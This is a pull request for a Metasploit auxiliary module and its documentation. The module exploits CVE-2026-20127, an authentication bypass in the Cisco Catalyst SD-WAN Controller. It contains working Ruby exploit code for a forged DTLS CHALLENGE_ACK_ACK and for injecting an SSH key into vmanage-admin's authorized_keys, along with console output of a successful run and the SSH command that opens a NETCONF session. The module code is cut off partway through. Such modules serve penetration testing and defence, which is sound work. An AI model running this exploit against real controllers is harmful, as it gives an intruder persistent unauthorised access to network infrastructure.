### PR TITLE
Add auxiliary module for Cisco Catalyst SD-WAN Controller Authentication Bypass Vulnerability (CVE-2026-20127)

### DIFF
--- a/documentation/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.md
+++ b/documentation/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.md
@@ -94,11 +94,11 @@ msf auxiliary(admin/networking/cisco_sdwan_auth_bypass) > run
 [*] Hello response received - we are now a trusted peer
 [*] Phase 5: SSH key injection into vmanage-admin authorized_keys
 [*] Generating RSA 2048-bit SSH keypair
-[*] SSH private key saved to: /tmp/sdwan_ssh_key_192.168.86.166_12346_1774009551
-[*] SSH public key saved to: /tmp/sdwan_ssh_key_192.168.86.166_12346_1774009551.pub
-[*] SSH private key saved to loot: /home/sfewer/.msf4/loot/20260320122551_default_192.168.86.166_cisco.sdwan.sshk_431386.pem
-[+] Use: ssh -i /tmp/sdwan_ssh_key_192.168.86.166_12346_1774009551 vmanage-admin@192.168.86.166 -p 830
-[*] Server responded with: REGISTER_TO_VMANAGE
+[*] SSH private key saved to loot: /home/sfewer/.msf4/loot/20260326150429_default_192.168.86.166_cisco.sdwan.sshk_366073.pem
+[+] Connect to NETCONF via:
+chmod 600 /home/sfewer/.msf4/loot/20260326150429_default_192.168.86.166_cisco.sdwan.sshk_366073.pem
+ssh -i /home/sfewer/.msf4/loot/20260326150429_default_192.168.86.166_cisco.sdwan.sshk_366073.pem vmanage-admin@192.168.86.166 -p 830
+[*] Server responded with: REGISTER_TO_VMANAGE (key has been injected)
 [+] Authentication bypass and SSH key injection completed!
 [*] Auxiliary module execution completed
 msf auxiliary(admin/networking/cisco_sdwan_auth_bypass) >
@@ -108,7 +108,8 @@ msf auxiliary(admin/networking/cisco_sdwan_auth_bypass) >
 Now we can use the generated SSH key to access the NETCONF service:
 
 ```console
-sfewer@sfewer-ubuntu-vm:~$ ssh -i /tmp/sdwan_ssh_key_192.168.86.166_12346_1774009551 vmanage-admin@192.168.86.166 -p 830
+sfewer@sfewer-ubuntu-vm:~$ chmod 600 /home/sfewer/.msf4/loot/20260326150429_default_192.168.86.166_cisco.sdwan.sshk_366073.pem
+sfewer@sfewer-ubuntu-vm:~$ ssh -i /home/sfewer/.msf4/loot/20260326150429_default_192.168.86.166_cisco.sdwan.sshk_366073.pem vmanage-admin@192.168.86.166 -p 830
 viptela 20.15.3 
 
 <?xml version="1.0" encoding="UTF-8"?>

--- a/documentation/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.md
+++ b/documentation/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.md
@@ -56,15 +56,6 @@ Path to an existing SSH public key file (in OpenSSH format) to inject into the c
 If not set, the module will automatically generate a new RSA 2048-bit SSH keypair. Using an existing key can be useful
 if you want to maintain access using a key you already control.
 
-### STORE_SSH_KEY_FILES
-
-Directory where generated SSH key files will be saved. Default: system temp directory (e.g., `/tmp`).
-
-If `SSH_PUBLIC_KEY_FILE` is not specified and the module generates a new keypair, both the private and public keys
-will be saved to this directory with a unique filename based on the target IP, port, and timestamp.
-
-The private key will be set to mode 0600 (read/write for owner only) for security.
-
 ## Scenarios
 
 ### Cisco Catalyst SD-WAN Controller 20.15.3 (Default Configuration)
@@ -85,7 +76,6 @@ Module options (auxiliary/admin/networking/cisco_sdwan_auth_bypass):
    RPORT                12346            yes       The target port (UDP)
    SITE_ID              100              yes       SD-WAN site ID
    SSH_PUBLIC_KEY_FILE                   no        Path to an existing SSH public key file to inject
-   STORE_SSH_KEY_FILES  /tmp             no        Directory to store generated SSH key files
 
 
 View the full module info with the info, or info -d command.

--- a/documentation/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.md
+++ b/documentation/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.md
@@ -1,0 +1,216 @@
+## Vulnerable Application
+
+This module exploits CVE-2026-20127, an authentication bypass vulnerability in the Cisco Catalyst SD-WAN Controller
+(vSmart). The vulnerability exists in the vdaemon DTLS control-plane service running on UDP port 12346.
+
+The vdaemon service fails to properly validate the `verify_status` byte in `CHALLENGE_ACK_ACK` (msg_type=10) messages.
+The `vbond_proc_challenge_ack_ack()` handler reads an attacker-controlled `verify_status` byte from the message body and,
+if non-zero, sets the peer's authenticated flag to 1. Furthermore, the authentication gate in `vbond_proc_msg()` exempts
+msg_type=10 from authentication checks, allowing an unauthenticated peer to send this message.
+
+An attacker can:
+1. Connect via DTLS 1.2 using a self-signed certificate (the server performs no certificate validation at the handshake stage)
+2. Skip the `CHALLENGE_ACK` step entirely
+3. Send a forged `CHALLENGE_ACK_ACK` message with `verify_status=1` to become a trusted peer without any legitimate credentials
+
+Once authenticated, the module leverages a `VMANAGE_TO_PEER` message to inject an SSH public key into the
+`/home/vmanage-admin/.ssh/authorized_keys` file, providing persistent SSH access to the controller's NETCONF service
+on port 830.
+
+### Affected Versions
+
+The vulnerability affects Cisco Catalyst SD-WAN Controller (vSmart) versions prior to the patches released in February 2026.
+Consult [Cisco's security advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa-EHchtZk)
+for a complete list of affected versions and patches.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. `use auxiliary/admin/networking/cisco_sdwan_auth_bypass`
+3. `set RHOST <target_ip>`
+4. Optionally, `set DOMAIN_ID <domain_id>` and `set SITE_ID <site_id>` if you know the target's SD-WAN topology
+5. `check` to verify the target is vulnerable
+6. `run` to exploit the vulnerability and inject an SSH public key
+7. Use the generated SSH private key to connect to the NETCONF service: `ssh -i <key_path> vmanage-admin@<target_ip> -p 830`
+
+## Options
+
+### DOMAIN_ID
+
+The SD-WAN domain ID to use in protocol messages. Default: `1`.
+
+This value must match the domain ID configured on the target controller. In most deployments, the default value of 1
+is used. If you receive a `TEAR_DOWN` message after sending `Hello`, try adjusting this value.
+
+### SITE_ID
+
+The SD-WAN site ID to use in protocol messages. Default: `100`.
+
+This value identifies the site in the SD-WAN topology. The default value should work in most cases, but if the exploit
+fails, you may need to adjust this based on knowledge of the target's SD-WAN configuration.
+
+### SSH_PUBLIC_KEY_FILE
+
+Path to an existing SSH public key file (in OpenSSH format) to inject into the controller.
+
+If not set, the module will automatically generate a new RSA 2048-bit SSH keypair. Using an existing key can be useful
+if you want to maintain access using a key you already control.
+
+### STORE_SSH_KEY_FILES
+
+Directory where generated SSH key files will be saved. Default: system temp directory (e.g., `/tmp`).
+
+If `SSH_PUBLIC_KEY_FILE` is not specified and the module generates a new keypair, both the private and public keys
+will be saved to this directory with a unique filename based on the target IP, port, and timestamp.
+
+The private key will be set to mode 0600 (read/write for owner only) for security.
+
+## Scenarios
+
+### Cisco Catalyst SD-WAN Controller 20.15.3 (Default Configuration)
+
+In this scenario, we target a vSmart controller with default settings. The module automatically generates an SSH keypair
+and injects the public key.
+
+```
+msf auxiliary(admin/networking/cisco_sdwan_auth_bypass) > show options 
+
+Module options (auxiliary/admin/networking/cisco_sdwan_auth_bypass):
+
+   Name                 Current Setting  Required  Description
+   ----                 ---------------  --------  -----------
+   DOMAIN_ID            1                yes       SD-WAN domain ID
+   RHOSTS               192.168.86.166   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
+                                                   metasploit.html
+   RPORT                12346            yes       The target port (UDP)
+   SITE_ID              100              yes       SD-WAN site ID
+   SSH_PUBLIC_KEY_FILE                   no        Path to an existing SSH public key file to inject
+   STORE_SSH_KEY_FILES  /tmp             no        Directory to store generated SSH key files
+
+
+View the full module info with the info, or info -d command.
+
+msf auxiliary(admin/networking/cisco_sdwan_auth_bypass) > check
+[+] 192.168.86.166:12346 - The target is vulnerable. Authentication bypass succeeded - server accepted forged CHALLENGE_ACK_ACK
+msf auxiliary(admin/networking/cisco_sdwan_auth_bypass) > run
+[*] Running module against 192.168.86.166
+[*] Phase 1: DTLS handshake with self-signed certificate
+[*] DTLS handshake succeeded (self-signed cert accepted)
+[*] Phase 2: Waiting for CHALLENGE from server
+[*] CHALLENGE received (580 bytes of challenge data)
+[*] Phase 3: Sending CHALLENGE_ACK_ACK with verify_status=1
+[*] Server Hello received
+[*] Phase 4: Sending Hello as authenticated peer
+[*] Hello response received - we are now a trusted peer
+[*] Phase 5: SSH key injection into vmanage-admin authorized_keys
+[*] Generating RSA 2048-bit SSH keypair
+[*] SSH private key saved to: /tmp/sdwan_ssh_key_192.168.86.166_12346_1774009551
+[*] SSH public key saved to: /tmp/sdwan_ssh_key_192.168.86.166_12346_1774009551.pub
+[*] SSH private key saved to loot: /home/sfewer/.msf4/loot/20260320122551_default_192.168.86.166_cisco.sdwan.sshk_431386.pem
+[+] Use: ssh -i /tmp/sdwan_ssh_key_192.168.86.166_12346_1774009551 vmanage-admin@192.168.86.166 -p 830
+[*] Server responded with: REGISTER_TO_VMANAGE
+[+] Authentication bypass and SSH key injection completed!
+[*] Auxiliary module execution completed
+msf auxiliary(admin/networking/cisco_sdwan_auth_bypass) >
+
+```
+
+Now we can use the generated SSH key to access the NETCONF service:
+
+```console
+sfewer@sfewer-ubuntu-vm:~$ ssh -i /tmp/sdwan_ssh_key_192.168.86.166_12346_1774009551 vmanage-admin@192.168.86.166 -p 830
+viptela 20.15.3 
+
+<?xml version="1.0" encoding="UTF-8"?>
+<hello xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
+<capabilities>
+<capability>urn:ietf:params:netconf:base:1.0</capability>
+<capability>urn:ietf:params:netconf:base:1.1</capability>
+<capability>urn:ietf:params:netconf:capability:confirmed-commit:1.1</capability>
+<capability>urn:ietf:params:netconf:capability:confirmed-commit:1.0</capability>
+<capability>urn:ietf:params:netconf:capability:candidate:1.0</capability>
+<capability>urn:ietf:params:netconf:capability:rollback-on-error:1.0</capability>
+<capability>urn:ietf:params:netconf:capability:url:1.0?scheme=ftp,sftp,file</capability>
+<capability>urn:ietf:params:netconf:capability:validate:1.0</capability>
+<capability>urn:ietf:params:netconf:capability:validate:1.1</capability>
+<capability>urn:ietf:params:netconf:capability:xpath:1.0</capability>
+<capability>urn:ietf:params:netconf:capability:notification:1.0</capability>
+<capability>urn:ietf:params:netconf:capability:interleave:1.0</capability>
+<capability>urn:ietf:params:netconf:capability:partial-lock:1.0</capability>
+<capability>urn:ietf:params:netconf:capability:with-defaults:1.0?basic-mode=trim&amp;also-supported=report-all-tagged,report-all</capability>
+<capability>urn:ietf:params:netconf:capability:with-operational-defaults:1.0?basic-mode=trim&amp;also-supported=report-all-tagged,report-all</capability>
+<capability>urn:ietf:params:netconf:capability:yang-library:1.0?revision=2019-01-04&amp;module-set-id=f1952c280658dd3701add48f1c71cbca</capability>
+<capability>urn:ietf:params:netconf:capability:yang-library:1.1?revision=2019-01-04&amp;content-id=f1952c280658dd3701add48f1c71cbca</capability>
+<capability>http://tail-f.com/ns/netconf/actions/1.0</capability>
+<capability>http://tail-f.com/ns/aaa/1.1?module=tailf-aaa&amp;revision=2023-04-13</capability>
+<capability>http://tail-f.com/ns/common/query?module=tailf-common-query&amp;revision=2017-12-15</capability>
+<capability>http://tail-f.com/ns/confd-progress?module=tailf-confd-progress&amp;revision=2020-06-29</capability>
+<capability>http://tail-f.com/ns/confd_dyncfg/1.0?module=confd_dyncfg&amp;revision=2023-09-29</capability>
+<capability>http://tail-f.com/ns/ietf-subscribed-notifications-deviation?module=ietf-subscribed-notifications-deviation&amp;revision=2020-06-25</capability>
+<capability>http://tail-f.com/ns/ietf-yang-push-deviation?module=ietf-yang-push-deviation</capability>
+<capability>http://tail-f.com/ns/kicker?module=tailf-kicker&amp;revision=2020-11-26</capability>
+<capability>http://tail-f.com/ns/mibs/IPV6-TC/199812010000Z?module=IPV6-TC&amp;revision=1998-12-01</capability>
+<capability>http://tail-f.com/ns/mibs/SNMP-COMMUNITY-MIB/200308060000Z?module=SNMP-COMMUNITY-MIB&amp;revision=2003-08-06</capability>
+<capability>http://tail-f.com/ns/mibs/SNMP-FRAMEWORK-MIB/200210140000Z?module=SNMP-FRAMEWORK-MIB&amp;revision=2002-10-14</capability>
+<capability>http://tail-f.com/ns/mibs/SNMP-MPD-MIB/200210140000Z?module=SNMP-MPD-MIB&amp;revision=2002-10-14</capability>
+<capability>http://tail-f.com/ns/mibs/SNMP-NOTIFICATION-MIB/200210140000Z?module=SNMP-NOTIFICATION-MIB&amp;revision=2002-10-14</capability>
+<capability>http://tail-f.com/ns/mibs/SNMP-TARGET-MIB/200210140000Z?module=SNMP-TARGET-MIB&amp;revision=2002-10-14</capability>
+<capability>http://tail-f.com/ns/mibs/SNMP-USER-BASED-SM-MIB/200210160000Z?module=SNMP-USER-BASED-SM-MIB&amp;revision=2002-10-16</capability>
+<capability>http://tail-f.com/ns/mibs/SNMP-VIEW-BASED-ACM-MIB/200210160000Z?module=SNMP-VIEW-BASED-ACM-MIB&amp;revision=2002-10-16</capability>
+<capability>http://tail-f.com/ns/mibs/SNMPv2-MIB/200210160000Z?module=SNMPv2-MIB&amp;revision=2002-10-16</capability>
+<capability>http://tail-f.com/ns/mibs/SNMPv2-SMI/1.0?module=SNMPv2-SMI</capability>
+<capability>http://tail-f.com/ns/mibs/SNMPv2-TC/1.0?module=SNMPv2-TC</capability>
+<capability>http://tail-f.com/ns/mibs/TRANSPORT-ADDRESS-MIB/200211010000Z?module=TRANSPORT-ADDRESS-MIB&amp;revision=2002-11-01</capability>
+<capability>http://tail-f.com/ns/netconf/query?module=tailf-netconf-query&amp;revision=2017-01-06</capability>
+<capability>http://tail-f.com/yang/acm?module=tailf-acm&amp;revision=2013-03-07</capability>
+<capability>http://tail-f.com/yang/common?module=tailf-common&amp;revision=2023-12-07</capability>
+<capability>http://tail-f.com/yang/common-monitoring?module=tailf-common-monitoring&amp;revision=2022-09-29</capability>
+<capability>http://tail-f.com/yang/common-monitoring2?module=tailf-common-monitoring2&amp;revision=2022-09-29</capability>
+<capability>http://tail-f.com/yang/confd-monitoring?module=tailf-confd-monitoring&amp;revision=2022-09-29</capability>
+<capability>http://tail-f.com/yang/confd-monitoring2?module=tailf-confd-monitoring2&amp;revision=2022-10-03</capability>
+<capability>http://tail-f.com/yang/last-login?module=tailf-last-login&amp;revision=2019-11-21</capability>
+<capability>http://tail-f.com/yang/netconf-monitoring?module=tailf-netconf-monitoring&amp;revision=2022-04-12</capability>
+<capability>http://tail-f.com/yang/xsd-types?module=tailf-xsd-types&amp;revision=2017-11-20</capability>
+<capability>http://viptela.com/aaa-ext?module=viptela-aaa-ext&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/actions?module=viptela-actions&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/clear?module=viptela-clear&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/common?module=viptela-common&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/debug?module=viptela-debug&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/devices?module=viptela-devices</capability>
+<capability>http://viptela.com/hardware?module=viptela-hardware&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/idmgr?module=viptela-idmgr&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/models?module=viptela-models</capability>
+<capability>http://viptela.com/omp?module=viptela-omp&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/oper-idmgr?module=viptela-oper-idmgr&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/oper-system?module=viptela-oper-system&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/oper-tenant?module=viptela-oper-tenant</capability>
+<capability>http://viptela.com/oper-vpn?module=viptela-oper-vpn&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/policy?module=viptela-policy&amp;revision=2024-07-01&amp;deviations=viptela-policy-deviation</capability>
+<capability>http://viptela.com/security?module=viptela-security&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/snmp?module=viptela-snmp&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/snmp-usm?module=viptela-snmp-usm&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/support?module=viptela-support&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/system?module=viptela-system&amp;revision=2024-07-01&amp;deviations=viptela-system-deviation</capability>
+<capability>http://viptela.com/tag-instance?module=viptela-tag-instance&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/tenant?module=viptela-tenant&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/timezones?module=viptela-timezones&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/viptela-clear-tenant?module=viptela-clear-tenant</capability>
+<capability>http://viptela.com/viptela-debug-tenant?module=viptela-debug-tenant</capability>
+<capability>http://viptela.com/viptela-global?module=viptela-global&amp;revision=2024-07-01</capability>
+<capability>http://viptela.com/vpn?module=viptela-vpn&amp;revision=2024-07-01</capability>
+<capability>urn:ietf:params:xml:ns:netconf:base:1.0?module=ietf-netconf&amp;revision=2011-06-01&amp;features=confirmed-commit,candidate,rollback-on-error,validate,xpath,url</capability>
+<capability>urn:ietf:params:xml:ns:netconf:partial-lock:1.0?module=ietf-netconf-partial-lock&amp;revision=2009-10-19</capability>
+<capability>urn:ietf:params:xml:ns:yang:iana-crypt-hash?module=iana-crypt-hash&amp;revision=2014-08-06&amp;features=crypt-hash-sha-512,crypt-hash-sha-256,crypt-hash-md5</capability>
+<capability>urn:ietf:params:xml:ns:yang:ietf-inet-types?module=ietf-inet-types&amp;revision=2013-07-15</capability>
+<capability>urn:ietf:params:xml:ns:yang:ietf-netconf-acm?module=ietf-netconf-acm&amp;revision=2018-02-14</capability>
+<capability>urn:ietf:params:xml:ns:yang:ietf-netconf-monitoring?module=ietf-netconf-monitoring&amp;revision=2010-10-04</capability>
+<capability>urn:ietf:params:xml:ns:yang:ietf-netconf-notifications?module=ietf-netconf-notifications&amp;revision=2012-02-06</capability>
+<capability>urn:ietf:params:xml:ns:yang:ietf-netconf-with-defaults?module=ietf-netconf-with-defaults&amp;revision=2011-06-01</capability>
+<capability>urn:ietf:params:xml:ns:yang:ietf-restconf-monitoring?module=ietf-restconf-monitoring&amp;revision=2017-01-26</capability>
+<capability>urn:ietf:params:xml:ns:yang:ietf-x509-cert-to-name?module=ietf-x509-cert-to-name&amp;revision=2014-12-10</capability>
+<capability>urn:ietf:params:xml:ns:yang:ietf-yang-metadata?module=ietf-yang-metadata&amp;revision=2016-08-05</capability>
+<capability>urn:ietf:params:xml:ns:yang:ietf-yang-smiv2?module=ietf-yang-smiv2&amp;revision=2012-06-22</capability>
+<capability>urn:ietf:params:xml:ns:yang:ietf-yang-types?module=ietf-yang-types&amp;revision=2013-07-15</capability>
+</capabilities>
+<session-id>25</session-id></hello>]]>]]>
+```

--- a/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
+++ b/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
@@ -58,8 +58,7 @@ class MetasploitModule < Msf::Auxiliary
         Opt::RPORT(12346),
         OptInt.new('DOMAIN_ID', [true, 'SD-WAN domain ID', 1]),
         OptInt.new('SITE_ID', [true, 'SD-WAN site ID', 100]),
-        OptPath.new('SSH_PUBLIC_KEY_FILE', [false, 'Path to an existing SSH public key file to inject']),
-        OptPath.new('STORE_SSH_KEY_FILES', [false, 'Directory to store generated SSH key files', Dir.tmpdir])
+        OptPath.new('SSH_PUBLIC_KEY_FILE', [false, 'Path to an existing SSH public key file to inject'])
       ]
     )
   end
@@ -259,58 +258,26 @@ class MetasploitModule < Msf::Auxiliary
 
     send_message(ssl, wbio, udp_sock, MSG_VMANAGE_TO_PEER, key_body, silent: silent)
 
-    privkey_path = nil
-
     if datastore['SSH_PUBLIC_KEY_FILE']
-      # If we are using an existing key suplied by the user, just show how to connect to the NETCONF service.
+      # If we are using an existing key supplied by the user, just show how to connect to the NETCONF service.
       print_good("Use: ssh -i <SSH_PRIVATE_KEY_FILE> vmanage-admin@#{rhost} -p 830") unless silent
     else
-      # If we generated a new key pain, store the private key as loot and write files
-      # Generate unique ID for filenames
-      key_id = "#{rhost}_#{rport}_#{Time.now.to_i}"
+      # Write SSH key files to loot directory
+      loot_path = store_loot(
+        'cisco.sdwan.sshkey',
+        'application/x-pem-file',
+        rhost,
+        ssh_privkey_pem,
+        'sdwan_ssh_key.pem',
+        'SSH private key for vmanage-admin access'
+      )
 
-      # Write SSH key files to STORE_SSH_KEY_FILES directory
-      if datastore['STORE_SSH_KEY_FILES']
-        begin
-          key_dir = datastore['STORE_SSH_KEY_FILES']
-          FileUtils.mkdir_p(key_dir) unless File.directory?(key_dir)
-
-          privkey_filename = "sdwan_ssh_key_#{key_id}"
-          pubkey_filename = "#{privkey_filename}.pub"
-          privkey_path = File.join(key_dir, privkey_filename)
-          pubkey_path = File.join(key_dir, pubkey_filename)
-
-          File.write(privkey_path, ssh_privkey_pem)
-          File.chmod(0o600, privkey_path)
-          File.write(pubkey_path, ssh_pubkey)
-
-          print_status("SSH private key saved to: #{privkey_path}") unless silent
-          print_status("SSH public key saved to: #{pubkey_path}") unless silent
-        rescue ::StandardError => e
-          print_error("Failed to write SSH key files: #{e.message}") unless silent
-        end
-      end
-
-      # Also store as loot (if database is available)
-      begin
-        loot_path = store_loot(
-          'cisco.sdwan.sshkey',
-          'application/x-pem-file',
-          rhost,
-          ssh_privkey_pem,
-          'sdwan_ssh_key.pem',
-          'SSH private key for vmanage-admin access'
-        )
-        print_status("SSH private key saved to loot: #{loot_path}") unless silent
-      rescue ::StandardError => e
-        vprint_status("Could not store loot (database may not be available): #{e.message}") unless silent
-      end
-
-      # Provide connection instructions
-      if privkey_path
-        print_good("Use: ssh -i #{privkey_path} vmanage-admin@#{rhost} -p 830") unless silent
-      else
-        print_good("Use: ssh -i <path_to_private_key> vmanage-admin@#{rhost} -p 830") unless silent
+      unless silent
+        print_status("SSH private key saved to loot: #{loot_path}")
+        # Provide connection instructions
+        print_good('Connect to NETCONF via:')
+        print_line("chmod 600 #{loot_path}")
+        print_line("ssh -i #{loot_path} vmanage-admin@#{rhost} -p 830")
       end
     end
 

--- a/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
+++ b/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
@@ -264,7 +264,7 @@ class MetasploitModule < Msf::Auxiliary
     privkey_path = nil
 
     if datastore['SSH_PUBLIC_KEY_FILE']
-      # If we are using an existing key suplied by the user, just show how to connect to teh NETCONF service.
+      # If we are using an existing key suplied by the user, just show how to connect to the NETCONF service.
       print_good("Use: ssh -i <SSH_PRIVATE_KEY_FILE> vmanage-admin@#{rhost} -p 830") unless silent
     else
       # If we generated a new key pain, store the private key as loot and write files

--- a/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
+++ b/modules/auxiliary/admin/networking/cisco_sdwan_auth_bypass.rb
@@ -1,0 +1,749 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'fiddle'
+require 'ipaddr'
+require 'base64'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Udp
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco Catalyst SD-WAN Controller Authentication Bypass',
+        'Description' => %q{
+          This module exploits an authentication bypass vulnerability (CVE-2026-20127)
+          in the Cisco Catalyst SD-WAN Controller (vSmart). The vdaemon DTLS control-plane
+          service fails to properly validate the verify_status byte in CHALLENGE_ACK_ACK
+          (msg_type=10) messages. The vbond_proc_challenge_ack_ack() handler reads an
+          attacker-controlled verify_status byte from the message body and, if non-zero,
+          sets the peer's authenticated flag to 1. Furthermore, the authentication gate in
+          vbond_proc_msg() exempts msg_type=10 from authentication checks, allowing an
+          unauthenticated peer to send this message.
+
+          An attacker can connect via DTLS 1.2 using a self-signed certificate (the server
+          performs no certificate validation at the handshake stage), skip the CHALLENGE_ACK
+          step, and send a forged CHALLENGE_ACK_ACK with verify_status=1 to become a trusted
+          peer without any legitimate credentials.
+
+          This module leverages the auth bypass to inject an SSH public key into the
+          vmanage-admin authorized_keys file via a VMANAGE_TO_PEER message, providing
+          persistent SSH access to the controller.
+        },
+        'Author' => ['sfewer-r7'],
+        'License' => MSF_LICENSE,
+        'References' => [
+          [
+            'CVE', '2026-20127',
+            'URL', 'https://github.com/sfewer-r7/CVE-2026-20127', # PoC
+            'URL', 'https://attackerkb.com/topics/bP3FMvHe7z/cve-2026-20127/rapid7-analysis', # Technical Analysis
+            'URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa-EHchtZk', # Vendor advisory
+            'URL', 'https://blog.talosintelligence.com/uat-8616-sd-wan/' # Additional advisory from Cisco Talos
+          ]
+        ],
+        'DisclosureDate' => '2026-02-25',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(12346),
+        OptInt.new('DOMAIN_ID', [true, 'SD-WAN domain ID', 1]),
+        OptInt.new('SITE_ID', [true, 'SD-WAN site ID', 100]),
+        OptPath.new('SSH_PUBLIC_KEY_FILE', [false, 'Path to an existing SSH public key file to inject']),
+        OptPath.new('STORE_SSH_KEY_FILES', [false, 'Directory to store generated SSH key files', Dir.tmpdir])
+      ]
+    )
+  end
+
+  def check
+    result = perform_auth_bypass(ssh_key_inject: false, silent: !datastore['VERBOSE'])
+    if result == :vulnerable
+      Msf::Exploit::CheckCode::Vulnerable('Authentication bypass succeeded - server accepted forged CHALLENGE_ACK_ACK')
+    elsif result == :detected
+      Msf::Exploit::CheckCode::Detected('DTLS service detected but bypass could not be confirmed')
+    else
+      Msf::Exploit::CheckCode::Unknown('Could not determine vulnerability status')
+    end
+  rescue ::StandardError => e
+    vprint_error("Check failed: #{e.message}")
+    Msf::Exploit::CheckCode::Unknown('Check failed due to an error')
+  end
+
+  def run
+    result = perform_auth_bypass(ssh_key_inject: true, silent: false)
+    if result == :vulnerable
+      print_good('Authentication bypass and SSH key injection completed!')
+    else
+      print_error('Exploit failed')
+    end
+  rescue ::StandardError => e
+    print_error("Module failed: #{e.message}")
+    vprint_error(e.backtrace.join("\n"))
+  end
+
+  private
+
+  def perform_auth_bypass(ssh_key_inject:, silent: false)
+    ssl = nil
+    ctx = nil
+    udp_sock = nil
+
+    begin
+      # Phase 1: DTLS handshake
+      ssl, ctx, udp_sock, rbio, wbio = phase1_dtls_handshake(silent: silent)
+      return :safe unless ssl
+
+      # Phase 2: Receive CHALLENGE
+      return :detected unless phase2_receive_challenge(ssl, rbio, wbio, udp_sock, silent: silent)
+
+      # Phase 3: Send CHALLENGE_ACK_ACK (the bypass)
+      return :detected unless phase3_send_challenge_ack_ack(ssl, rbio, wbio, udp_sock, silent: silent)
+
+      # Phase 4: Send Hello
+      return :detected unless phase4_send_hello(ssl, rbio, wbio, udp_sock, silent: silent)
+
+      # Phase 5: SSH Key Injection
+      phase5_ssh_key_inject(ssl, rbio, wbio, udp_sock, silent: silent) if ssh_key_inject
+
+      :vulnerable
+    ensure
+      cleanup_dtls(ssl, ctx, udp_sock)
+    end
+  end
+
+  def phase1_dtls_handshake(silent: false)
+    print_status('Phase 1: DTLS handshake with self-signed certificate') unless silent
+
+    load_openssl_ffi(silent: silent)
+
+    # Generate self-signed certificate (in-memory, no files written to disk)
+    cert_der, key_der = generate_self_signed_cert
+
+    # Create UDP socket
+    udp_sock = Rex::Socket::Udp.create(
+      'PeerHost' => rhost,
+      'PeerPort' => rport,
+      'Context' => { 'Msf' => framework, 'MsfExploit' => self }
+    )
+
+    # Create DTLS context
+    method_ptr = @f_dtls_client_method.call
+    fail_with(Failure::Unknown, 'DTLS_client_method() returned NULL') if method_ptr.null?
+
+    ctx = @f_ssl_ctx_new.call(method_ptr)
+    fail_with(Failure::Unknown, 'SSL_CTX_new() returned NULL') if ctx.null?
+
+    # Disable peer certificate verification
+    @f_ssl_ctx_set_verify.call(ctx, SSL_VERIFY_NONE, Fiddle::NULL)
+
+    # Load certificate and key from in-memory DER data
+    ret = @f_ssl_ctx_use_certificate_asn1.call(ctx, cert_der.bytesize, cert_der)
+    fail_with(Failure::Unknown, "SSL_CTX_use_certificate_ASN1 failed (ret=#{ret})") unless ret == 1
+
+    ret = @f_ssl_ctx_use_privatekey_asn1.call(EVP_PKEY_RSA, ctx, key_der, key_der.bytesize)
+    fail_with(Failure::Unknown, "SSL_CTX_use_PrivateKey_ASN1 failed (ret=#{ret})") unless ret == 1
+
+    # Create SSL object
+    ssl = @f_ssl_new.call(ctx)
+    fail_with(Failure::Unknown, 'SSL_new() returned NULL') if ssl.null?
+
+    # Create memory BIOs
+    mem_method = @f_bio_s_mem.call
+    rbio = @f_bio_new.call(mem_method)
+    wbio = @f_bio_new.call(mem_method)
+    fail_with(Failure::Unknown, 'BIO_new() returned NULL') if rbio.null? || wbio.null?
+
+    # Attach BIOs to SSL (SSL takes ownership)
+    @f_ssl_set_bio.call(ssl, rbio, wbio)
+
+    # Perform DTLS handshake
+    do_dtls_handshake(ssl, rbio, wbio, udp_sock)
+
+    print_status('DTLS handshake succeeded (self-signed cert accepted)') unless silent
+
+    [ssl, ctx, udp_sock, rbio, wbio]
+  rescue ::Rex::ConnectionError, ::Errno::ECONNREFUSED => e
+    print_error("Connection failed: #{e.message}") unless silent
+    cleanup_dtls(ssl, ctx, udp_sock)
+    [nil, nil, nil, nil, nil]
+  rescue Fiddle::DLError => e
+    print_error("OpenSSL FFI error: #{e.message}") unless silent
+    cleanup_dtls(ssl, ctx, udp_sock)
+    [nil, nil, nil, nil, nil]
+  end
+
+  def phase2_receive_challenge(ssl, rbio, wbio, udp_sock, silent: false)
